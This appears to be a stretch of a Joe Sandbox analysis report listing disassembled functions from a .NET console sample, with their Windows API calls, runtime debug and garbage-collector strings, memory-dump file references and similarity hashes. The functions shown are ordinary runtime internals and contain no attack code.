                                                                                                                                                                                                                          Function 0123C570 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129synchronizationthreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,01242A01,?,?,?,03C176F0), ref: 0123C620
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,?,01242A01,?,?,?,03C176F0), ref: 0123C65F
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0123C688
                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,?,01242A01,?,?,?,03C176F0), ref: 0123C69D
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,01242A01,?,?,?,03C176F0), ref: 0123C71B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D::TART: Skipping for shutdown., xrefs: 0123C5AE
                                                                                                                                                                                                                          • D::SSCIPCE: Calling IsRCThreadReady(), xrefs: 0123C639
                                                                                                                                                                                                                          • D::TART: Trapping all Runtime threads., xrefs: 0123C5E3
                                                                                                                                                                                                                          • D::SSCIPCE: done doing helper thread duty. Current helper thread id=0x%x, xrefs: 0123C6F7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Event$CurrentObjectResetSingleThreadWait
                                                                                                                                                                                                                          • String ID: D::SSCIPCE: Calling IsRCThreadReady()$D::SSCIPCE: done doing helper thread duty. Current helper thread id=0x%x$D::TART: Skipping for shutdown.$D::TART: Trapping all Runtime threads.
                                                                                                                                                                                                                          • API String ID: 976909831-2666063001
                                                                                                                                                                                                                          • Opcode ID: 5fce700bd5dfc20176c4f9d518882c4e9dc32b11cbc557f8b182a2cdad17ba40
                                                                                                                                                                                                                          • Instruction ID: a6b5973d37c302b98725c3d7085d51be69bdaee7cad745e0ab192512c60e8b3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fce700bd5dfc20176c4f9d518882c4e9dc32b11cbc557f8b182a2cdad17ba40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55410674720301AFEB249F68D885B667BA5FF84300F14409DEE055B3A6EB76EC60CB61
                                                                                                                                                                                                                          Function 0105E800 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 267memorystringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,7CAB6A82,?,00000001,00000000), ref: 0105E837
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0105E8C3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0105E901
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000), ref: 0105E93D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0105E99F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,?,00000000), ref: 0105EAC8
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,7CAB6A82,00000000,?,00000000), ref: 0105EB42
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,7CAB6A82,00000000,?,00000000), ref: 0105EB71
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ByteCharMultiWide$strlen
                                                                                                                                                                                                                          • String ID: Arg_InvalidUTF8String
                                                                                                                                                                                                                          • API String ID: 1299763742-2433089184
                                                                                                                                                                                                                          • Opcode ID: 7bd1fbd742accf591b809c3aa0b75f991208294a6af5d433df53f254d5867f09
                                                                                                                                                                                                                          • Instruction ID: 35dd4719866b9fcaeb1be24443771d0abffc8ff54ddf3a14795f644c577a15fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bd1fbd742accf591b809c3aa0b75f991208294a6af5d433df53f254d5867f09
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CA19374A40219AFEBA09F59DC88BABF7F9FB44710F1001E9E989A7291D7745E408F90
                                                                                                                                                                                                                          Function 010AED60 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 246COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Waiting for GC completion failed, xrefs: 0115DE16
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DFD6
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DC68
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: leaving., xrefs: 0115E05A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorEventLast
                                                                                                                                                                                                                          • String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: leaving.$Waiting for GC completion failed
                                                                                                                                                                                                                          • API String ID: 3848097054-492000563
                                                                                                                                                                                                                          • Opcode ID: afb417fbe325976edc528aa1327c188be87fa6f62b6062b1a6882b801e246326
                                                                                                                                                                                                                          • Instruction ID: 9c4b7f8591e636ea4285e9f57fdddba9c1f74c3c6fea5018d2d835a302d7bd20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb417fbe325976edc528aa1327c188be87fa6f62b6062b1a6882b801e246326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E991E430700301DBEF6D9B5CEC84B6A7BA5AF40704F09805CED695B2DADBB1A851CBA1
                                                                                                                                                                                                                          Function 012DA7E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D6020: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,012DA7F8,?,00000000,?,?,?,?,?,012DACC7), ref: 012D6025
                                                                                                                                                                                                                            • Part of subcall function 012D6020: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6073
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,012D9CE0,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA84E
                                                                                                                                                                                                                            • Part of subcall function 012DB590: WriteFile.KERNEL32(?,?,?,00000000,00000004,00000000,00000000,00000001,?), ref: 012DB5B5
                                                                                                                                                                                                                            • Part of subcall function 012DB590: GetLastError.KERNEL32 ref: 012DB5C4
                                                                                                                                                                                                                            • Part of subcall function 012DB590: GetOverlappedResult.KERNEL32(?,00000004,00000000,00000001), ref: 012DB5DE
                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA88B
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA8CA
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA942
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,012D9CE0,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA9DD
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,012D9CE0,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DAA00
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DOTNET_IPC_V1, xrefs: 012DA996
                                                                                                                                                                                                                          • Failed to send DiagnosticsIPC response, xrefs: 012DA829
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$EnvironmentStringsmalloc$ErrorFileFreeLastOverlappedResultWrite
                                                                                                                                                                                                                          • String ID: DOTNET_IPC_V1$Failed to send DiagnosticsIPC response
                                                                                                                                                                                                                          • API String ID: 3916477055-2167823670
                                                                                                                                                                                                                          • Opcode ID: c904babaa6ead7e411d248bf9c42c9969a5e09ab871a9778739655831339e963
                                                                                                                                                                                                                          • Instruction ID: 1c706e76e299e1d809f0ab50cf824bc608612e0e90da17f88eb313d116ccccd3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c904babaa6ead7e411d248bf9c42c9969a5e09ab871a9778739655831339e963
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE612775A102029BDF109F68C841BAEBBB1FF88300F1A816CDE46AB355D771E912CBD1
                                                                                                                                                                                                                          Function 011369C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 170memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748), ref: 01136A62
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0159BB90,00000001,7CAB6A82), ref: 01136AE5
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,015A6828,?), ref: 01136B00
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,015A6828,?), ref: 01136B16
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 01136B71
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0159BB90,?,?,00000000,00000000,00000000,000000FF), ref: 01136B9E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01136BCC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 01136B69
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcstok_s$FreeHeap$_swprintf
                                                                                                                                                                                                                          • String ID: {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                                                                                                                                                          • API String ID: 4021065324-128308884
                                                                                                                                                                                                                          • Opcode ID: 039d902c056de8bf1923967a57dc5033b87a9b7487dfbfb858fe503770d9a1ae
                                                                                                                                                                                                                          • Instruction ID: 5887415aa87309be9e0f17c103fa619ed9e015d6a35bef90233d21b7e3f4bfc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 039d902c056de8bf1923967a57dc5033b87a9b7487dfbfb858fe503770d9a1ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6561A3B1D00258AFEF15DBE5CD04BAEBBF8AF44715F044129E915EB2C8E7B85A04CB51
                                                                                                                                                                                                                          Function 01229AF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,gcgenaware.{pid}.nettrace,00000000,00000000,00000001), ref: 01229B27
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 01229B30
                                                                                                                                                                                                                          • _itow_s.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000014,0000000A), ref: 01229B3F
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 01229B4F
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 01229B62
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,gcgenaware.{pid}.nettrace,gcgenaware.{pid}.nettrace,00000000,00000001), ref: 01229B9A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat_swcsncpy_s$CurrentProcess_itow_s
                                                                                                                                                                                                                          • String ID: gcgenaware.{pid}.nettrace${pid}
                                                                                                                                                                                                                          • API String ID: 1046258036-1878681484
                                                                                                                                                                                                                          • Opcode ID: 9a76832c461deab99331c9d8e565d62393f15983608b0c6c5128bbbc8ff2af5f
                                                                                                                                                                                                                          • Instruction ID: 743ff161743cc13ed86eb5b94a2a77499a4e6b8657fd1c972cc38404502baa7d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a76832c461deab99331c9d8e565d62393f15983608b0c6c5128bbbc8ff2af5f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC11CCB16002086FD710EB79DC89DFF776CEF94312F81002DFA06AB290DA705921C7A1
                                                                                                                                                                                                                          Function 01096540 Relevance: 14.0, APIs: 5, Strings: 4, Instructions: 483memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000407,00000000,?), ref: 01096C7D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: (dynamicClass)$(null)$...$VALUETYPE
                                                                                                                                                                                                                          • API String ID: 3298025750-1208169921
                                                                                                                                                                                                                          • Opcode ID: bf1be1e03fbfbb3b37edf5dc4a50a6e3c1e7215fe3b8f4f84acc48e1cb15829c
                                                                                                                                                                                                                          • Instruction ID: 2c5b4e802d34e08f24a37e8915c0f7205155d3ef35cede1a4462522636713d6b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf1be1e03fbfbb3b37edf5dc4a50a6e3c1e7215fe3b8f4f84acc48e1cb15829c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8412CF709002099BEF21EF24CDA9BEEB7F4AF44304F1441DDD5896B291DB75AA84EF81
                                                                                                                                                                                                                          Function 00FC21C0 Relevance: 13.9, APIs: 11, Instructions: 164COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0164759C,7CAB6A82,03C16310,00000000,01647570,00000000,014B3694,000000FF,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC21F2
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016475B8,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2215
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016475D4,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2236
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647574,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2266
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0164766C,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC22A7
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647644,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC22E8
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647694,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2329
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016476BC,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC236A
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016475F0,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC239C
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0164760C,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC23C0
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647628,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC23E4
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4157389036-0
                                                                                                                                                                                                                          • Opcode ID: 1d1b715f9d8555b08366997b3bd84b0f2735d3b7677532cf27ad58f2d093a9b1
                                                                                                                                                                                                                          • Instruction ID: 1c3dc0c21068304ef3194213f808a1842ec71c6b59d0db56044382c79e76fc42
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d1b715f9d8555b08366997b3bd84b0f2735d3b7677532cf27ad58f2d093a9b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E810572810B518FE331CF25C945782BBF4FF25304F224B1DD88696A21E7B9B6988BC5
                                                                                                                                                                                                                          Function 012164A0 Relevance: 13.9, APIs: 9, Instructions: 354COMMONLIBRARYCODE
